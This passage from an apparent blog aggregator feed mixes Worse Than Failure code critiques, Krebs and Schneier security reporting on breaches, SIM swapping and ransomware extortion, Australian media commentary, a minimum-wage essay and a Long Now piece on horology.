else if DateTime.Today.year = 2012 then
    year = "M"
else if DateTime.Today.year = 2013 then
    year = "N"
else if DateTime.Today.year = 2014 then
    year = "O"
else if DateTime.Today.year = 2015 then
    year = "P"
else if DateTime.Today.year = 2016 then
    year = "Q"
else if DateTime.Today.year = 2017 then
    year = "R"
else if DateTime.Today.year = 2018 then
    year = "S"
else if DateTime.Today.year = 2019 then
    year = "T"
else if DateTime.Today.year = 2020 then
    year = "U"
else if DateTime.Today.year = 2021 then
    year = "V"
else if DateTime.Today.year = 2022 then
    year = "W"
else if DateTime.Today.year = 2023 then
    year = "X"
else if DateTime.Today.year = 2024 then
    year = "Y"
else
    year = "Z"
end if

For want of a mod, 2026 was lost. But hey, this code was clearly written in 2010, which means it will work just fine for a decade and a half. We should all be so lucky.
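The missing mod is a one-liner. A sketch in Java rather than the original dialect (the name yearLetter is ours):

```java
// Sketch: the label rollover the requirement actually asked for.
// 2000 -> "A", 2001 -> "B", ... 2025 -> "Z", 2026 -> "A" again.
public class YearLetter {
    static String yearLetter(int year) {
        // floorMod keeps the result non-negative even for years < 2000.
        return String.valueOf((char) ('A' + Math.floorMod(year - 2000, 26)));
    }

    public static void main(String[] args) {
        System.out.println(yearLetter(2010)); // K
        System.out.println(yearLetter(2025)); // Z
        System.out.println(yearLetter(2026)); // A - no expiration date
    }
}
```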

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

Cryptogram Google’s Project Zero Finds a Nation-State Zero-Day Operation

Google’s Project Zero discovered, and caused to be patched, eleven zero-day exploits against Chrome, Safari, Microsoft Windows, and iOS. This seems to have been exploited by “Western government operatives actively conducting a counterterrorism operation”:

The exploits, which went back to early 2020 and used never-before-seen techniques, were “watering hole” attacks that used infected websites to deliver malware to visitors. They caught the attention of cybersecurity experts thanks to their scale, sophistication, and speed.


It’s true that Project Zero does not formally attribute hacking to specific groups. But the Threat Analysis Group, which also worked on the project, does perform attribution. Google omitted many more details than just the name of the government behind the hacks, and through that information, the teams knew internally who the hacker and targets were. It is not clear whether Google gave advance notice to government officials that they would be publicizing and shutting down the method of attack.


Krebs on SecurityAre You One of the 533M People Who Got Facebooked?

Ne’er-do-wells leaked personal data — including phone numbers — for some 533 million Facebook users this week. Facebook says the data was collected before 2020 when it changed things to prevent such information from being scraped from profiles. To my mind, this just reinforces the need to remove mobile phone numbers from all of your online accounts wherever feasible. Meanwhile, if you’re a Facebook product user and want to learn if your data was leaked, there are easy ways to find out.

The HaveIBeenPwned project, which collects and analyzes hundreds of database dumps containing information about billions of leaked accounts, has incorporated the data into its service. Facebook users can enter the mobile number (in international format) associated with their account and see if those digits were exposed in the new data dump (HIBP doesn’t show you any data, just gives you a yes/no on whether your data shows up).

The phone number associated with my late Facebook account (which I deleted in Jan. 2020) was not in HaveIBeenPwned, but then again Facebook claims to have more than 2.7 billion active monthly users.

It appears much of this database has been kicking around the cybercrime underground in one form or another since last summer at least. According to a Jan. 14, 2021 Twitter post from Under the Breach’s Alon Gal, the 533 million Facebook accounts database was first put up for sale back in June 2020, offering Facebook profile data from 100 countries, including name, mobile number, gender, occupation, city, country, and marital status.

Under The Breach also said back in January that someone had created a Telegram bot allowing users to query the database for a low fee, and enabling people to find the phone numbers linked to a large number of Facebook accounts.

A cybercrime forum ad from June 2020 selling a database of 533 Million Facebook users. Image: @UnderTheBreach

Many people may not consider their mobile phone number to be private information, but there is a world of misery that bad guys, stalkers and creeps can visit on your life just by knowing your mobile number. Sure they could call you and harass you that way, but more likely they will see how many of your other accounts — at major email providers and social networking sites like Facebook, Twitter and Instagram — rely on that number for password resets.

From there, the target is primed for a SIM-swapping attack, where thieves trick or bribe employees at mobile phone stores into transferring ownership of the target’s phone number to a mobile device controlled by the attackers. From there, the bad guys can reset the password of any account to which that mobile number is tied, and of course intercept any one-time tokens sent to that number for the purposes of multi-factor authentication.

Or the attackers take advantage of some other privacy and security wrinkle in the way SMS text messages are handled. Last month, a security researcher showed how easy it was to abuse services aimed at helping celebrities manage their social media profiles to intercept SMS messages for any mobile user. That weakness has supposedly been patched for all the major wireless carriers now, but it really makes you question the ongoing sanity of relying on the Internet equivalent of postcards (SMS) to securely handle quite sensitive information.

My advice has long been to remove phone numbers from your online accounts wherever you can, and avoid selecting SMS or phone calls for second factor or one-time codes. Phone numbers were never designed to be identity documents, but that’s effectively what they’ve become. It’s time we stopped letting everyone treat them that way.

Any online accounts that you value should be secured with a unique and strong password, as well as the most robust form of multi-factor authentication available. Usually, this is a mobile app like Authy or Google Authenticator that generates a one-time code. Some sites like Twitter and Facebook now support even more robust options — such as physical security keys.

Removing your phone number may be even more important for any email accounts you may have. Sign up with any service online, and it will almost certainly require you to supply an email address. In nearly all cases, the person who is in control of that address can reset the password of any associated services or accounts, merely by requesting a password reset email.

Unfortunately, many email providers still let users reset their account passwords by having a link sent via text to the phone number on file for the account. So remove the phone number as a backup for your email account, and ensure a more robust second factor is selected for all available account recovery options.

Here’s the thing: Most online services require users to supply a mobile phone number when setting up the account, but do not require the number to remain associated with the account after it is established. I advise readers to remove their phone numbers from accounts wherever possible, and to take advantage of a mobile app to generate any one-time codes for multifactor authentication.

Why did KrebsOnSecurity delete its Facebook account early last year? Sure, it might have had something to do with the incessant stream of breaches, leaks and privacy betrayals by Facebook over the years. But what really bothered me was the number of people who felt comfortable sharing extraordinarily sensitive information with me on things like Facebook Messenger, all the while expecting that I could vouch for the privacy and security of that message just by virtue of my presence on the platform.

In case readers want to get in touch for any reason, my email here is krebsonsecurity at gmail dot com. I also respond at Krebswickr on the encrypted messaging platform Wickr.

Worse Than Failure: CodeSOD: He Sed What?

Today's code is only part of the WTF. The code is bad, it's incorrect, but the mistake is simple and easy to make.

Lowell was recently digging into a broken feature in a legacy C application. The specific error was a failure when invoking a sed command from inside the application.

// use the following to remove embedded newlines: sed ':a;N;$!ba;s/\n,/,/g'
snprintf(command, sizeof(command),
         "sed -i ':a;N;$!ba;s/\n,/,/g' %s/%s.txt", path, file);
system(command);

While regular expressions have a reputation for being cryptic, this one is at least easy to read- or at least, easier to read than the pile of sed flags that precede it. s/\n,/,/g finds every newline character followed by a comma and replaces it with just a comma. At least, that was the intent, but there's one problem: we're not calling sed from inside the shell.

We're calling it from C, and C is going to interpret the \n as a newline itself. The actual command which gets sent to the shell is:

sed -i ':a;N;$!ba;s/
,/,/g' /var/tmp/backup.txt

This completely broke one of the features of this legacy application. Specifically, as you might guess from the shell command above, the backup functionality. The application had the ability to backup its data in a way that would let users revert to prior application states or migrate to other hosts. The commit which introduced the sed call broke that feature.

In 2018. For nearly three years, all of the customers running this application have been running it without backups.

Lowell sums it up:

The real WTF may be the first part of my reply: "Looks like backup was broken by a commit in December 2018. The 2014 version should work."



Krebs on Security: Ransom Gangs Emailing Victim Customers for Leverage

Some of the top ransomware gangs are deploying a new pressure tactic to push more victim organizations into paying an extortion demand: Emailing the victim’s customers and partners directly, warning that their data will be leaked to the dark web unless they can convince the victim firm to pay up.

This letter is from the Clop ransomware gang, putting pressure on a recent victim named on Clop’s dark web shaming site.

“Good day! If you received this letter, you are a customer, buyer, partner or employee of [victim],” the missive reads. “The company has been hacked, data has been stolen and will soon be released as the company refuses to protect its peoples’ data.”

“We inform you that information about you will be published on the darknet [link to dark web victim shaming page] if the company does not contact us,” the message concludes. “Call or write to this store and ask to protect your privacy!!!!”

The message above was sent to a customer of RaceTrac Petroleum, an Atlanta company that operates more than 650 retail gasoline convenience stores in 12 southeastern states. The person who shared that screenshot above isn’t a distributor or partner of RaceTrac, but they said they are a RaceTrac rewards member, so the company definitely has their email address and other information.

Several gigabytes of the company’s files — including employee tax and financial records — have been posted to the victim shaming site for the Clop ransomware gang.

In response to questions from KrebsOnSecurity, RaceTrac said it was recently impacted by a security incident affecting one of its third-party service providers, Accellion Inc.

For the past few months, attackers have been exploiting a zero-day vulnerability in Accellion File Transfer Appliance (FTA) software, a flaw that has been seized upon by Clop to break into dozens of other major companies like oil giant Shell and security firm Qualys.

“By exploiting a previously undetected software vulnerability, unauthorized parties were able to access a subset of RaceTrac data stored in the Accellion File Transfer Service, including email addresses and first names of some of our RaceTrac Rewards Loyalty users,” the company wrote. “This incident was limited to the aforementioned Accellion services and did not impact RaceTrac’s corporate network. The systems used for processing guest credit, debit and RaceTrac Rewards transactions were not impacted.”

The same extortion pressure email has been going out to people associated with the University of California, which was one of several large U.S. universities that got hit with Clop ransomware recently. Most of those university ransomware incidents appeared to be tied to attacks on the same Accellion vulnerability, and the company has acknowledged roughly a third of its customers on that appliance got compromised as a result.

Clop is one of several ransom gangs that will demand two ransoms: One for a digital key needed to unlock computers and data from file encryption, and a second to avoid having stolen data published or sold online. That means even victims who opt not to pay to get their files and servers back still have to decide whether to pay the second ransom to protect the privacy of their customers.

As I noted in Why Paying to Delete Stolen Data is Bonkers, leaving aside the notion that victims might have any real expectation the attackers will actually destroy the stolen data, new research suggests a fair number of victims who do pay up may see some or all of the stolen data published anyway.

The email in the screenshot above differs slightly from those covered last week by Bleeping Computer, which was the first to spot the new victim notification wrinkle. Those emails say that the recipient is being contacted as they are a customer of the store, and their personal data, including phone numbers, email addresses, and credit card information, will soon be published if the store does not pay a ransom, writes Lawrence Abrams.

“Perhaps you bought something there and left your personal data. Such as phone, email, address, credit card information and social security number,” the Clop gang states in the email.

Fabian Wosar, chief technology officer at computer security firm Emsisoft, said the direct appeals to victim customers is a natural extension of other advertising efforts by the ransomware gangs, which recently included using hacked Facebook accounts to post victim shaming advertisements.

Wosar said Clop isn’t the only ransomware gang emailing victim customers.

“Clop likes to do it and I think REvil started as well,” Wosar said.

Earlier this month, Bleeping Computer reported that the REvil ransomware operation was planning on launching crippling distributed denial of service (DDoS) attacks against victims, or making VOIP calls to victims’ customers to apply further pressure.

“Sadly, regardless of whether a ransom is paid, consumers whose data has been stolen are still at risk as there is no way of knowing if ransomware gangs delete the data as they promise,” Abrams wrote.

Cory Doctorow: How To Destroy Surveillance Capitalism (Part 01)

This week on my podcast, part one of a serialized reading of my 2020 Onezero/Medium book How To Destroy Surveillance Capitalism, now available in paperback (you can also order signed and personalized copies from Dark Delicacies, my local bookstore).


Worse Than Failure: CodeSOD: Switching Your Template

Many years ago, Kari got a job at one of those small companies that lives in the shadow of a university. It was founded by graduates of that university, mostly recruited from that university, and the CEO was a fixture at alumni events.

Kari was a rare hire not from that university, but she knew the school had a reputation for having an excellent software engineering program. She was prepared to be a little behind her fellow employees, skills-wise, but looked forward to catching up.

Kari was unprepared for the kind of code quality these developers produced.

First, let's take a look at how they, as a company standard, leveraged C++ templates. C++ templates are similar to (though more complicated than) the generics you find in other languages. Defining a function template like template<typename T> void myfunction(T param) creates a function which can be applied to any type, so myfunction(5) and myfunction("a string") and myfunction(someClassVariable) are all valid. The beauty, of course, is that you can write a template method once, but use it in many ways.

Kari provided some generic examples of how her employer leveraged this feature, to give us a sense of what the codebase was like:

enum SomeType {
  SOMETYPE_TYPE1
  // ... more types here
};

template<SomeType t> void Function1();

template<> void Function1<SOMETYPE_TYPE1>() {
  // Implementation of Function1 for TYPE1 as a template specialization
}

template<> void Function1<SOMETYPE_TYPE2>() {
  // Implementation of Function1 for TYPE2 as a template specialization
}
// ... more specializations here

void CallFunction1(SomeType type) {
  switch(type) {
    case SOMETYPE_TYPE1: Function1<SOMETYPE_TYPE1>(); break;
    case SOMETYPE_TYPE2: Function1<SOMETYPE_TYPE2>(); break;
    // ... I think you get the picture
    default: assert(false); break;
  }
}

This technique allows them to define multiple versions of a method called Function1, and then decide which version needs to be invoked by using a type flag and a switch statement. This simultaneously misses the point of templates and of overloading. And honestly, while I'm not sure exactly what business problem they were trying to solve, this is a textbook case for using polymorphism to dispatch calls to concrete implementations via inheritance.

Which raises the question, if this is how they do templates, how do they do inheritance? Oh, you know how they do inheritance.

enum ClassType {
  CLASSTYPE_CHILD1
  // ... more enum values here
};

class Parent {
public:
  Parent(ClassType type) : type_(type) { }
  ClassType get_type() const { return type_; }

  bool IsXYZSupported() const {
    switch(type_) {
      case CHILD1: return true;
      // ... more cases here
      default: assert(false); return false;
    }
  }

private:
  ClassType type_;
};

class Child1 : public Parent {
public:
  Child1() : Parent(CLASSTYPE_CHILD1) { }
};

// Somewhere else in the application, buried deep within hundreds of lines of obscurity...
bool IsABCSupported(Parent *obj) {
  switch(obj->get_type()) {
    case CLASSTYPE_CHILD1: return true;
    // ... more cases here
    default: assert(false); return false;
  }
}

Yes, once again, we have a type flag and a switch statement. Inheritance would do this for us. They've reinvented the wheel, but this time, it's a triangle. An isosceles triangle, at that.

All that's bad, but the thing which elevates this code to transcendentally bad are the locations of the definitions of IsXYZSupported and IsABCSupported. IsXYZSupported is unnecessary, something which shouldn't exist, but at least it's in the definition of the class. Well, it's in the definition of the parent class, which means the parent has to know each of its children, which opens up a whole can of worms regarding fragility. But there are also stray methods like IsABCSupported, defined someplace else, to do something else, and this means that doing any tampering to the class hierarchy means tracking down possibly hundreds of random methods scattered in the code base.

And, if you're wondering how long these switch statements could get? Kari says: "The record I saw was a switch with approximately 100 cases."



Krebs on Security: Ubiquiti All But Confirms Breach Response Iniquity

For four days this past week, Internet-of-Things giant Ubiquiti did not respond to requests for comment on a whistleblower’s allegations the company had massively downplayed a “catastrophic” two-month breach ending in January to save its stock price, and that Ubiquiti’s insinuation that a third-party was to blame was a fabrication. I was happy to add their eventual public response to the top of Tuesday’s story on the whistleblower’s claims, but their statement deserves a post of its own because it actually confirms and reinforces those claims.

Ubiquiti’s IoT gear includes things like WiFi routers, security cameras, and network video recorders. Their products have long been popular with security nerds and DIY types because they make it easy for users to build their own internal IoT networks without spending many thousands of dollars.

But some of that shine started to come off recently for Ubiquiti’s more security-conscious customers after the company began pushing everyone to use a unified authentication and access solution that makes it difficult to administer these devices without first authenticating to Ubiquiti’s cloud infrastructure.

All of a sudden, local-only networks were being connected to Ubiquiti’s cloud, giving rise to countless discussion threads on Ubiquiti’s user forums from customers upset over the potential for introducing new security risks.

And on Jan. 11, Ubiquiti gave weight to that angst: It told customers to reset their passwords and enable multifactor authentication, saying a breach involving a third-party cloud provider might have exposed user account data. Ubiquiti told customers they were “not currently aware of evidence of access to any databases that host user data, but we cannot be certain that user data has not been exposed.”

Ubiquiti’s notice on Jan. 12, 2021.

On Tuesday, KrebsOnSecurity reported that a source who participated in the response to the breach said Ubiquiti should have immediately invalidated all credentials because all of the company’s key administrator passwords had been compromised as well. The whistleblower also said Ubiquiti never kept any logs of who was accessing its databases.

The whistleblower, “Adam,” spoke on condition of anonymity for fear of reprisals from Ubiquiti. Adam said the place where those key administrator credentials were compromised — Ubiquiti’s presence on Amazon’s Web Services (AWS) cloud services — was in fact the “third party” blamed for the hack.

From Tuesday’s piece:

“In reality, Adam said, the attackers had gained administrative access to Ubiquiti’s servers at Amazon’s cloud service, which secures the underlying server hardware and software but requires the cloud tenant (client) to secure access to any data stored there.

“They were able to get cryptographic secrets for single sign-on cookies and remote access, full source code control contents, and signing keys exfiltration,” Adam said.

Adam says the attacker(s) had access to privileged credentials that were previously stored in the LastPass account of a Ubiquiti IT employee, and gained root administrator access to all Ubiquiti AWS accounts, including all S3 data buckets, all application logs, all databases, all user database credentials, and secrets required to forge single sign-on (SSO) cookies.

Such access could have allowed the intruders to remotely authenticate to countless Ubiquiti cloud-based devices around the world. According to its website, Ubiquiti has shipped more than 85 million devices that play a key role in networking infrastructure in over 200 countries and territories worldwide.

Ubiquiti finally responded on Mar. 31, in a post signed “Team UI” on the company’s community forum online.

“Nothing has changed with respect to our analysis of customer data and the security of our products since our notification on January 11. In response to this incident, we leveraged external incident response experts to conduct a thorough investigation to ensure the attacker was locked out of our systems.”

“These experts identified no evidence that customer information was accessed, or even targeted. The attacker, who unsuccessfully attempted to extort the company by threatening to release stolen source code and specific IT credentials, never claimed to have accessed any customer information. This, along with other evidence, is why we believe that customer data was not the target of, or otherwise accessed in connection with, the incident.”

Ubiquiti’s response this week on its user forum.

Ubiquiti also hinted it had an idea of who was behind the attack, saying it has “well-developed evidence that the perpetrator is an individual with intricate knowledge of our cloud infrastructure. As we are cooperating with law enforcement in an ongoing investigation, we cannot comment further.”

Ubiquiti’s statement largely confirmed the reporting here by not disputing any of the facts raised in the piece. And while it may seem that Ubiquiti is quibbling over whether data was in fact stolen, Adam said Ubiquiti can say there is no evidence that customer information was accessed because Ubiquiti failed to keep logs of who was accessing its databases.

“Ubiquiti had negligent logging (no access logging on databases) so it was unable to prove or disprove what they accessed, but the attacker targeted the credentials to the databases, and created Linux instances with networking connectivity to said databases,” Adam wrote in a whistleblower letter to European privacy regulators last month. “Legal overrode the repeated requests to force rotation of all customer credentials, and to revert any device access permission changes within the relevant period.”

It appears investors noticed the incongruity as well. Ubiquiti’s share price hardly blinked at the January breach disclosure. On the contrary, from Jan. 13 to Tuesday’s story its stock had soared from $243 to $370. By the end of trading day Mar. 30, UI had slipped to $349. By close of trading on Thursday (markets were closed Friday) the stock had fallen to $289.

Sam Varghese: Time for ABC to bite the bullet and bring Tony Jones back to Q+A

Finally, someone from the mainstream Australian media has called it: Q+A, once one of the more popular shows on the ABC, is really not worth watching any more.

Of course, being Australian, the manner in which this sentiment was expressed was oblique, more so given that it came from a critic who writes for the Nine newspapers, Craig Mathieson.

Hamish Macdonald: his immature approach to Q+A has led to the program going downhill. Courtesy YouTube

A second critical review has appeared on April 5, this time in The Australian.

Newspapers from this company are generally classed as being from the left — they once were, when they were owned by Fairfax Media, but centrist or right of centre would be more accurate these days — and given that the ABC is also considered to be part of the left, criticism was generally absent.

Mathieson did not come right out and call the program atrocious – which is what it is right now. The way the headline on Mathieson’s article put it was that Q+A was once an agenda setter, but was no longer essential viewing. He was right about the former, but to call it essential viewing at any stage of its existence is probably an exaggeration.

He cited viewing figures to bolster his views: “Audience figures for Q+A have plummeted this year. Last week [25 March], it failed to crack the top 20 free-to-air programs on the Thursday night it aired, indicating a capital city audience of just 237,000. In March 2020, the number was above 500,000, and likewise in March 2016,” he wrote.

“This was meant to be the year that Q+A ascended to new prominence. Since its debut in 2008 it had aired about 9.30pm on Mondays, the feisty debate chaser to Four Corners and Media Watch.

“In 2021, it moved to 8.30pm on Thursday, an hour earlier presumably to give it access to a larger audience and its own anchoring role on the ABC’s schedule. But even with Back Roads, one of the national broadcaster’s quiet achievers, as an 8pm lead-in, the viewing figures are starting to resemble a death spiral.”

Veteran ABC journalist Tony Jones was the Q+A host until just two seasons ago. Then Hamish Macdonald, from the tabloid TV channel 10, was given the job. And things have generally gone downhill from that point onwards.

Courtesy The Australian

Jones brought a mature outlook to the show and was generally able to keep the discussion interesting. He always had things in check and the panellists were kept in line when they tried to ramble on. Quite often, the show was prevented from going down a difficult path by a simple “I’ll take that as a comment” from Jones.

Macdonald often loses control of things. He seems to be trying too hard to differentiate himself from Jones, bringing too many angles to a single episode and generally trying to engineer gotcha situations. It turns out to be quite juvenile. One word describes him: callow. It is one that can be applied to many of the ABC’s recent recruits.

Had the previous host been anyone but Jones, the difference would not have been so stark. But then even when others like Virginia Trioli or Annabel Crabb stood in for Jones, the show was watchable as nobody tried out gimmicks. Again, Trioli and Crabb are very good at their jobs. The same cannot be said for Macdonald.

Now that Jones has had to shelve his plan of accompanying his partner, Sarah Ferguson, to China, the ABC might like to think of bringing him back to Q+A. The plan was for Ferguson to be the ABC’s regular correspondent in China, but that was dropped after the previous correspondent, Bill Birtles, fled the country last September, along with Michael Smith, a correspondent for the Australian Financial Review. Jones had planned to write a book while in China.

The ABC needs to bite the bullet and rescue what was once one of its flagship shows. As Mathieson did, it is worthwhile pointing out that two other popular shows, 7.30 and Four Corners, have held their own during the same period that Q+A has gone downhill, even improving on previous audience numbers.

If change does come, it would be at the end of this season. Another season of Macdonald will mean that Q+A may have to be pensioned off like Lateline, which was killed largely because the main host, Emma Alberici, had made it into a terrible program. Under Jones, and others like Maxine McKew, Trioli and even the comparatively younger Stephen Cannane, Lateline was always compulsory watching for any Australian who followed news somewhat seriously.


Sam Varghese: AFR’s Aaron Patrick shows us what gutter journalism is all about

Australian journalists often criticise each other, with those on the right tending to go for those on the left and vice versa. But, generally, in these stoushes, details of people’s private lives are not revealed.

But there are exceptions, and one of those was witnessed on March 31, when Aaron Patrick, the senior correspondent with the Australian Financial Review, took a swing at Samantha Maiden, a reporter with a free site operated by News Corporation, over coverage of numerous issues around women. (News Corporation’s other sites are all paywalled.)

In February, Maiden exposed the story of a young Liberal staffer, Brittany Higgins, who had been allegedly raped by a colleague in Parliament House some two years ago.

And then this month, after ABC journalist Louise Milligan had written about an unnamed senior politician who was accused of an alleged rape some 30-plus years ago, Maiden revealed a large number of additional details about the case, something which Patrick dubbed “intimate and compelling information“.

The takeoff point for Patrick was his claim that women pursuing these cases are “activists”. Apparently, he does not think that women have news sense and are producing some of the stronger stories in the media because they are simply better at their jobs than the countless men.

Patrick used Prime Minister Scott Morrison’s reaction at a media conference when asked about standards in Parliament House as some kind of a lede. Sky News’ staffer Andrew Clennell had asked Morrison: “Prime Minister, if you’re the boss at a business and there had been an alleged rape on your watch and this incident we heard about last night on your watch, your job would probably be in a bit of jeopardy, wouldn’t it? Doesn’t it look like you have lost control of your ministerial staff?”

When Morrison suggested that standards in other workplaces could also be faulted, Clennell did not give up, saying: “Well, they’re better than these I would suggest, Prime Minister.”

To which Morrison, who has a short fuse, retorted: “Let me take you up on that Let me take you up on that. Right now, you would be aware that in your own organisation that there is a person who has had a complaint made against them for harassment of a woman in a women’s toilet and that matter is being pursued by your own HR department.”

What he was referring to was an exchange of words between Maiden and a reporter named Jade Gailberger who works for the News Corporation internal wire service. Maiden, according to Patrick, wanted someone else to be on the federal parliamentary press gallery committee, rather than Gailberger. So some words were exchanged.

Morrison’s mischaracterisation was not allowed to stand, with the boss of News Corporation shooting it down in a strongly worded press release the same night.

Then Patrick, perhaps feeling he had set the scene, reached into the gutter, revealing personal details about Maiden, which have nothing to do with her reporting ability (which, even a cynic like me, would rate as damn good).

In Australia (and most of the West), there is a kind of fake politeness that dominates the workplace, and Patrick appears to want Maiden to conform to this. The fact that she works best on her own — “fellow journalists… said she did not prize teamwork and intimidated younger reporters, male and female” — is a big negative to him.

He seems to be unaware that the best journalists are always oddballs. They do not follow the beaten path; for them output is more important than input. Seymour Hersh, Matt Taibbi and Glenn Greenwald come to mind. Patrick is clearly in the opposite camp.

In the end, the whole piece ended up being an exercise in character defamation and one of carrying water for Morrison. Patrick may get much more than a Christmas card from the Lodge this year, perhaps a turkey and a bottle of champers as well.

Journalists are supposed to hold power to account, not to bitch about their colleagues’ personal lives and try to tear them down. But many journalists, Patrick included, have long forgotten that they are the fourth estate and want to be players themselves.

There is an incestuous relationship between journalists who work in Canberra and politicians; I have mentioned it on more than one occasion. So what Patrick has done is not unique.

But in the process he has forgotten that the main job of a journalist is to either break, or else follow up, on news stories. These kinds of personal smears are one more reason why the public has been turned off mainstream media. He has truly plumbed the depths. You really can’t go lower than this.


Chaotic Idealism: Why we need a higher minimum wage

Imagine an auction where your work is up for sale; but many other people’s work is also up for sale, so that some lots will always remain unsold. There are more workers than jobs.

What is the best strategy for someone who wants a worker, any worker? It is to be the first to bid, bid the minimum, and then not raise anyone else’s bid. Raising is counterproductive because supply exceeds demand, and one can always wait until other buyers have hired their workers to bid the minimum on one of the lots left over. Because this is the ideal strategy, everyone will be using it. Every lot of work that can be bought, is bought, and for the minimum possible price.

For the worker, the only possible strategy is to accept any bid, because if they do not accept, they will be left till last and their work will be one of the unsold lots.

There is a way out for the worker, and that is to learn a skilled trade. However, this is a way out only for that worker. Other unskilled workers are still caught in the same system, and because there are still unskilled jobs and unskilled workers, the minimum-wage auction will go on as before.

Moreover, if too many workers learn skilled trades, employers in those trades will fulfill their quotas, leaving these overqualified workers to compete for unskilled jobs where their skills are irrelevant–back to the minimum-wage auction.

When the minimum wage is too low, the unskilled (or overqualified) worker naturally tries to fill their own needs, usually by taking more than one job, and by adding more family members–children and spouses–to the job market, to take jobs rather than being homemakers or students. This unbalances the system even further: There are yet more workers, and yet fewer jobs. The employer is able to bid even lower, and the worker must immediately accept any offer they can, for fear of not being employed at all.

When the employer hits the federal minimum wage, they cannot reduce the worker’s pay further; but they can still split jobs into part-time positions without benefits, hire people to work for tips, and hire “self-employed” “independent contractors” who can be paid less than minimum wage because they are technically not their employees. And this is what they do, because the market permits them to do it, because people still take those jobs, because those are the only ones they can get.

We have too many people in the work force and too few jobs for them to do. A low minimum wage forces more people to take more jobs, while simultaneously allowing employers to pay less.

If we raised the minimum wage, then there would be fewer workers, because a minimum wage job would once again be enough to support a family. Many jobs are being replaced with automation, but because of the higher minimum wage, those jobs would no longer be desperately fought over by unskilled workers.

As more jobs are replaced by automation, we may end up with the same scenario again: People fight over jobs, and employers find ways to pay less and less. At this point, we would need to institute a universal basic income, paid for by taxes on corporations. There’s simply no way around that–even though it might slow down when employers are forced to stop hiring so many part-timers and contractors, the number of jobs will eventually be much less than the number of people willing to work. At that point, those extra workers will be supported by universal basic income and, instead, do unpaid work like art, volunteer work, or study. The only alternative to this is a world in which a majority of unskilled workers are barely scraping by on half a job, crammed together in apartments that take five salaries to pay for, unable to afford health care, higher education, or anything but the next day’s low-quality food–and sometimes not even that.


Sam Varghese: Peter van Onselen is no journalist. He is a political operative

Peter van Onselen is an academic from Western Australia who came to prominence in 2007 when he co-authored a biography of John Howard, the Liberal prime minister who reigned from 1996 to 2007.

Nearly 14 years later, Van Onselen has graduated to become a journalist who writes a weekly column for the right-wing broadsheet, The Australian, and also functions as the political editor for the tabloid free-to-air TV channel, 10.

Recently, however, Van Onselen has shown that he is no journalist, but rather a political operative who looks to back his powerful friends when they need his help. And nobody has needed his help more than the attorney-general, Christian Porter, a close mate of his and a source for many of his stories.

Porter was recently accused of raping a woman in 1988, when she was 16 and he was 17. The woman, known as Kate, died by her own hand last year, and did not make a police complaint, though she did toy with the idea. She is said to have been a highly intelligent person, but the alleged incident appears to have taken its toll, and she was described by many as having some mental problems.

Christian Porter (extreme left) and Peter van Onselen (third from right) in their younger days. Photo courtesy Kangaroo Court of Australia

Porter was not named in any stories initially, but held a press conference on 3 March and outed himself. He then took leave from his job and intends to come back at the end of the month.

A dossier of notes that Kate maintained was sent to a number of people, and Van Onselen managed to obtain a copy. Using that, he tried to paint Porter as innocent, both in written columns and on the state-run TV broadcaster, where he appeared as a panellist on a program called Insiders.

He had a clear conflict of interest and should not have appeared on such a program; declaring a conflict and stepping aside is what a journalist does. But then he does not appear to be a journalist at all.

Other right-wing journalists, like Chris Uhlmann of Nine Entertainment and Phillip Coorey of the Australian Financial Review, have also done their bit to defend Porter, but none as blatantly as Van Onselen, who also defended his friend on ABC Radio.

Porter has now filed a defamation suit against the ABC over an article written by one of its journalists, Louise Milligan, based on that dossier. She did not contact Porter for comment, but then he was not named in the story. Many other journalists contacted Porter's office and the offices of other ministers too, but did not get a reaction.

The ABC has to file its written defence by May 4 and Porter’s lawyers have to respond by May 11.

A preliminary court hearing is to be held on May 14, but it is unlikely that a trial will be held before 2021 ends.

The incestuous relationship between politicians and journalists is quite common in Canberra; here are two other instances: 1, 2.


Rondam RamblingsRepeal the Second Amendment

It has become repetitive to the point of being tiresome: a crazy person buys an automatic weapon and kills a bunch of innocent bystanders.  TV "news" reporters gather like vultures on a carcass.  Prayers are said.  Hands are wrung.  Soap boxes are scaled and calls for gun control are recited, which collide head-on with the second amendment and DC v. Heller.  And then, a few days later, everyone

LongNowIn Real Time

Horologist Brittany Nicole Cox giving a talk at The Interval at Long Now on horological heritage (02019). Photo by Anthony Thornton.

How do you measure a year? As straightforward as this seems, it is a truly personal question for each of us. What comes to mind? Life, weather or seismic events, loss or gains, political enterprises, a global pandemic? Or terms such as calendars, months, or dates? As a horologist, someone who studies time, I've realized there is no concrete way to answer that question. Yet my job lies in the calculation, measurement, and sure prediction of time passing in hours, minutes, and seconds. One might say I measure time through numbers, but often it is measured through the inevitable deterioration of the mechanisms I study that are responsible for calculating the passing of time. If anything, I have found that time is not measurable, but perceptible. It is the observation of change and loss that accounts for the passing of time.

Brittany Nicole Cox at her workbench. Photograph by Ben Lindbloom.

In my work I watch the brass and steel components of clock and watch mechanisms wear and break down, an indicator of how hard time has been on them. The tarnish of brass is the result of age and environmental factors. These mechanisms are continually renewed with the intention of the timepiece maintaining both its tangible and intangible qualities: its ability to calculate and record the passing of time, as well as fulfill its function as an artifact created by someone long ago with their own artistic vision and intentions for the observer. As time went on, these mechanisms were made with more wear-resistant materials, always with the hope that they could outlast degradation, despite time. Perhaps one of the most successful at this was the 18th-century clockmaker John Harrison, the man responsible for inventing the first marine chronometer. Some of his timepieces required no lubrication, as he invented rolling bearings for the application and relied on the synthesis between materials to maintain the timekeeping qualities of the mechanism.¹ The clocks of John Harrison can still be seen keeping time at the Royal Observatory in Greenwich, London.

John Harrison’s H4, displayed at the Royal Observatory in Greenwich. Photograph by Mike Peel (CC BY-SA 4.0).

